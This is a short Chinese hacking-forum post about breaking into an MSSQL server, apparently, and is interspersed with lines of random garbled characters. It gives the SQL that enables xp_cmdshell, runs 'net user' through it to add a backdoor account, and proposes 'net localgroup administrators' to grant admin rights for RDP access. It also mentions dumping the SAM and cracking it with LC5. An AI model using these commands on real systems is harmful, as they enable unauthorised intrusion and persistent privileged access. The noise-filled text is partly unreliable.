saitojie

  I) n# N: Z4 `( [
7 r) ]( L0 {, L. R5 c0 @

6 N) T) @1 L! q9 @& C5 M
于是开始找开启语句，对mssql的玩的少，不是太熟悉！
  n& b5 J+ F! D2 l2 [, ~/ g后来二少给我了语句，便去继续日之( ^9 w; s" Y( L
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
" S" n# L/ |* a* S% t5 J1为开启，0则为关闭！% R! F1 v. \& C- V& E) N+ t" d
然后执行
! C# O2 g$ q7 U' t' n/ \2 TEXEC [master].[dbo].[xp_cmdshell] 'cmd /c net user xx xx /add'
( `" E; m6 C7 {9 R即可
1 |1 e* O" q% _: N6 a- N回过头去看看，发现用户已经成功添加上了！
# j& P. Q" D" I; ^

2 c: i- ~3 I+ I9 t$ v/ J
我就不明白BKK了，这个地方，你都已经加上用户了，为什么不直接加入到管理组里面，连接服务器的3389呢，为什么还要去下他的SAM，还用LC5去爆力破解呢！~~~~不明白！~~~
# Q6 y$ a( y8 ~; _0 nEXEC [master].[dbo].[xp_cmdshell] 'net localgroup administrators username /add'，难道是因为他的3389做了登陆用户的限制？